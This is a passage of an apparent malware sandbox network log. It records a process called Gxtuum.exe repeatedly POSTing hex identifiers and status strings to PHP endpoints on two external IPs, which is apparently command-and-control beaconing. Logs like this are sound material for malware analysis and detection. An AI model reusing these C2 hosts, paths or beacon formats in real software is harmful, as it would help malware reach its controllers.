                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              65192.168.2.449847185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:21.080219984 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:22.440085888 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:21 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              66192.168.2.449855185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:24.194046974 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:25.533883095 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:24 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              67192.168.2.449856185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:24.195647955 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:25.533108950 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:24 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              68192.168.2.449862185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:27.159646034 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:28.517689943 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:27 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              69192.168.2.449863185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:27.159869909 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:28.518207073 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:27 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              70192.168.2.449875185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:30.268210888 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:31.617827892 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:30 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              71192.168.2.449874185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:30.268290043 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:31.617913961 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:30 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              72192.168.2.449881185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:33.251629114 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:34.643469095 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:33 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              73192.168.2.449882185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:33.252262115 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:34.642431974 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:33 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              74192.168.2.449893185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:36.394649029 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:37.974992037 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:37 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              75192.168.2.449894185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:36.394809961 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:37.975018024 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:37 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              76192.168.2.449900185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:39.612216949 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:40.970432997 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:40 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              77192.168.2.449901185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:39.612792969 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:40.971540928 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:40 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              78192.168.2.449907185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:42.720627069 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:44.063769102 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:43 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              79192.168.2.449908185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:42.720639944 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:44.064337015 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:43 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              80192.168.2.449919185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:45.690417051 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:47.050899982 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:46 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              81192.168.2.449920185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:45.690882921 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:47.050945044 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:46 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              82192.168.2.449926185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:48.799166918 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:50.143004894 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:49 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              83192.168.2.449927185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:48.799683094 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:48:50.142918110 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:49 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              84192.168.2.449938185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:51.843974113 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:53.239470005 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:52 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              85192.168.2.449939185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:48:51.844192982 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:48:53.239578962 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:48:52 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              86192.168.2.449946185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
